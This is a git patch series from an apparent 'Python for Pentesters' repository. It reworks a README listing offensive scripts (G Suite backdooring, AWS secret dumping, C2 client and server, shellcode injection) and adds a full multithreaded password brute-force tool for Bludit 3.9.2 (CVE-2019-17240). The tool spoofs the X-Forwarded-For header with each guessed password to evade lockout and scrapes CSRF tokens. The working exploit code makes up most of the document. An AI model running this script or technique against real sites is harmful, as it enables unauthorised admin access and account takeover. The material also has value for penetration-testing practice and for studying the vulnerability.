From d3dac308937a2661794c77fac3dd0f457e8b5df6 Mon Sep 17 00:00:00 2001 From: zweilosec Date: Thu, 18 Jun 2020 16:29:04 +0000 Subject: [PATCH 1/3] GitBook: [master] 2 pages modified --- README.md | 84 ++++++++++++++++++++++++++++-------------------------- SUMMARY.md | 4 +++ 2 files changed, 48 insertions(+), 40 deletions(-) create mode 100644 SUMMARY.md diff --git a/README.md b/README.md index 46b2256..80a40ef 100644 --- a/README.md +++ b/README.md @@ -1,40 +1,44 @@ -Python for Pentesters -================== - -## Overview ## -Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started. - -**Brought to you by:** - -![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png "Black Hills Information Security") - -## Examples: by Mike Felch (@ustayready) and Joff Thyer (@joff_thyer) ## -This code is provided purely for educational purposes. - - * pivot_winrm.py: shows how to use Python with winrm to execute commands on a remote machine - * cloud_aws_s3.py: search AWS S3 buckets for sensitive filenames - * cloud_aws_secrets.py: Dump all the secrets in AWS Secrets Manager - * cloud_azure_ad.py: Dumping AzureAD users - * cloud_gsuite_backdoor.py: Backdooring G Suite accounts for full access - * cloud_gsuite_email.py: Reading GMail emails - * crack_jwt.py: Cracking JSON web tokens - * live_host_discovery.py: Discovering live hosts on a network - * live_port_discovery.py: Discovering open ports on a host - * passwords_attack.py: Trying username/password combinations on a web authentication portal - * pivot_psremoting.py: Pivoting in a Windows environment using PSRemoting - * pivot_wmi.py: Pivoting in a Windows environment using WMI - * shodan_search.py: Searching for internet connected devices on Shodan - * socket_c2_client.py: C2 socket client - * socket_c2_server.py: C2 socket server - * web_brute.py: Brute forcing web paths for unknown attack surfaces - * web_robots.py: Downloading the robots.txt for URLs - * web_sniff.py: Sniffing HTTP packets - * web_spa.py: Interacting with a single page app with a headless browser then copying session cookies to the requests library - * pymeta.py: Read all files in a directory recursively and extracts metadata from any office documents, and PDFs discovered - * powerstrip.py: Strips comments out of a PowerShell script, and writes a file with -stripped as part of the filename - * pyinjector.py: Using ctypes to execute shellcode within the same process or inject into a remote process using thread manipulation - - - - - +--- +description: >- + A collection of python scripts collected from various sources to help in + penetration testing and Red Teams. Examples can be found in their relevant + Github accounts. +--- + +# Python for Pentesters + +## Overview \#\# + +Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started. + +**Brought to you by:** + +![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png) + +## Examples: by Mike Felch \(@ustayready\) and Joff Thyer \(@joff\_thyer\) \#\# + +This code is provided purely for educational purposes. + +* pivot\_winrm.py: shows how to use Python with winrm to execute commands on a remote machine +* cloud\_aws\_s3.py: search AWS S3 buckets for sensitive filenames +* cloud\_aws\_secrets.py: Dump all the secrets in AWS Secrets Manager +* cloud\_azure\_ad.py: Dumping AzureAD users +* cloud\_gsuite\_backdoor.py: Backdooring G Suite accounts for full access +* cloud\_gsuite\_email.py: Reading GMail emails +* crack\_jwt.py: Cracking JSON web tokens +* live\_host\_discovery.py: Discovering live hosts on a network +* live\_port\_discovery.py: Discovering open ports on a host +* passwords\_attack.py: Trying username/password combinations on a web authentication portal +* pivot\_psremoting.py: Pivoting in a Windows environment using PSRemoting +* pivot\_wmi.py: Pivoting in a Windows environment using WMI +* shodan\_search.py: Searching for internet connected devices on Shodan +* socket\_c2\_client.py: C2 socket client +* socket\_c2\_server.py: C2 socket server +* web\_brute.py: Brute forcing web paths for unknown attack surfaces +* web\_robots.py: Downloading the robots.txt for URLs +* web\_sniff.py: Sniffing HTTP packets +* web\_spa.py: Interacting with a single page app with a headless browser then copying session cookies to the requests library +* pymeta.py: Read all files in a directory recursively and extracts metadata from any office documents, and PDFs discovered +* powerstrip.py: Strips comments out of a PowerShell script, and writes a file with -stripped as part of the filename +* pyinjector.py: Using ctypes to execute shellcode within the same process or inject into a remote process using thread manipulation + diff --git a/SUMMARY.md b/SUMMARY.md new file mode 100644 index 0000000..cfbd5ed --- /dev/null +++ b/SUMMARY.md @@ -0,0 +1,4 @@ +# Table of contents + +* [Python for Pentesters](README.md) + From 848f44f776852fa84b07589ef158bcc870f0bc7d Mon Sep 17 00:00:00 2001 From: WolfZweiler <61819873+zweilosec@users.noreply.github.com> Date: Sun, 9 Aug 2020 09:12:45 -0400 Subject: [PATCH 2/3] Create bludit-3.9.2_pwd-bruteforce_multi.py Brute-force password sprayer for Bludit 3.9.2 and below. CVE-2019-17240 This script is based off the POC from https://rastating.github.io/bludit-brute-force-mitigation-bypass/ Also borrows code from https://github.com/averagesecurityguy/scripts/blob/master/bruteforce/multi_ssh.py to make it multithreaded Everything works except closing gracefully on success --- bludit-3.9.2_pwd-bruteforce_multi.py | 131 +++++++++++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 bludit-3.9.2_pwd-bruteforce_multi.py diff --git a/bludit-3.9.2_pwd-bruteforce_multi.py b/bludit-3.9.2_pwd-bruteforce_multi.py new file mode 100644 index 0000000..5be0c66 --- /dev/null +++ b/bludit-3.9.2_pwd-bruteforce_multi.py @@ -0,0 +1,131 @@ +#!/usr/bin/env python3 + +#CVE-2019-17240 +#Bludit <= 3.9.2 Admin Portal login brute-force tool +#Need valid username to use + +import multiprocessing +import sys +import time +from multiprocessing import Queue +import re +import requests + +def worker(cred_queue): + print('Starting new worker thread.') + while True: + try: + password = cred_queue.get(timeout=10) + except Queue.Empty: + return + + try: + + session = requests.Session() + login_page = session.get(login_url) + csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1) + + print('[*] Trying: {p}'.format(p = password)) + + headers = { + 'X-Forwarded-For': password, + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', + 'Referer': login_url + } + + data = { + 'tokenCSRF': csrf_token, + 'username': username, + 'password': password, + 'save': '' + } + + login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False) + + if 'location' in login_result.headers: + if '/admin/dashboard' in login_result.headers['location']: + print() + print('SUCCESS: Password found!') + print('Use {u}:{p} to login.'.format(u = username, p = password)) + print() + break + + + except Exception: + #Make this exception more verbose and useful + e = sys.exc_info()[2] + print("Failed on: {0} {1}".format(password, str(e))) + return + + #This is useful for rate-limiting. Uncomment to use. +# time.sleep(.5) + + cleanup(procs) + sys.exit() + #For some reason I still can't get this to exit properly. + #TODO: Fix this to clean up all threads and exit gracefully upon success + #below is the error output + """ + Process Process-7: + Traceback (most recent call last): + File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap + self.run() + File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run + self._target(*self._args, **self._kwargs) + File "bludit-3.9.2-bruteForce-multi.py", line 59, in worker + cleanup(procs) + File "bludit-3.9.2-bruteForce-multi.py", line 99, in cleanup + p.join() + File "/usr/lib/python3.8/multiprocessing/process.py", line 147, in join + assert self._parent_pid == os.getpid(), 'can only join a child process' + AssertionError: can only join a child process + """ + + +def file_to_list(wList): + passlist= [] + #latin1 encoding is necessary to get `rockyou.txt` to work + #this may cause problems with other wordlists + #need to add check for encoding type on input file + with open(wList, encoding='latin1') as wordList: + templist = wordList.readlines() + + for word in templist: + passlist.append(word.strip()) + + return passlist + + +def cleanup(processes): + # Wait for all worker processes to finish + for p in processes: + p.terminate() + p.join() + + +if __name__ == '__main__': + print("#CVE-2019-17240") + print("#Bludit <= 3.9.2 Admin Portal login brute-force tool") + if len(sys.argv) != 4: + print('Usage: python3 bludit-3.9.2-bruteForce-multi.py http:// ') + sys.exit() + + host = sys.argv[1] + login_url = host + '/admin/login' + username = sys.argv[2] + wordlist = sys.argv[3] + threads = 10 + passwords = file_to_list(wordlist) + + cred_queue = multiprocessing.Queue() + procs = [] + + print('Starting {0} worker threads.'.format(threads)) + for i in range(threads): + p = multiprocessing.Process(target=worker, args=(cred_queue, )) + procs.append(p) + p.start() + + print('Loading credential queue.') + for pwd in passwords: + cred_queue.put((pwd)) From 18e0cb3a8d4604243a2d1c1f737178b110430433 Mon Sep 17 00:00:00 2001 From: WolfZweiler <61819873+zweilosec@users.noreply.github.com> Date: Sun, 9 Aug 2020 09:22:18 -0400 Subject: [PATCH 3/3] Update and reorg Reorganized to reflect I will be adding my own code to this repo Added bludit-bruteforce tool --- README.md | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 80a40ef..c385739 100644 --- a/README.md +++ b/README.md @@ -9,15 +9,18 @@ description: >- ## Overview \#\# -Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts to help get you started. +Getting started with Python for pentesting and red team engagements is fairly easy! This repo is just a small collection of random scripts from various sources. -**Brought to you by:** +This code is provided purely for educational purposes. All responsibility for any potential damage or unethical/illegal behavior is solely on the user. -![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png) +# My scripts +* bludit-3.9.2_pwd-bruteforce_multi.py: Multithreaded password brute-force tool to get valid password for exploiting CVE-2019-17240 + +# Scripts from other sources -## Examples: by Mike Felch \(@ustayready\) and Joff Thyer \(@joff\_thyer\) \#\# +**Many scripts written by: Mike Felch \(@ustayready\) and Joff Thyer \(@joff\_thyer\) of:** -This code is provided purely for educational purposes. +![Black Hills Information Security](https://www.blackhillsinfosec.com/wp-content/uploads/2016/03/BHIS-logo-L-300x300.png) * pivot\_winrm.py: shows how to use Python with winrm to execute commands on a remote machine * cloud\_aws\_s3.py: search AWS S3 buckets for sensitive filenames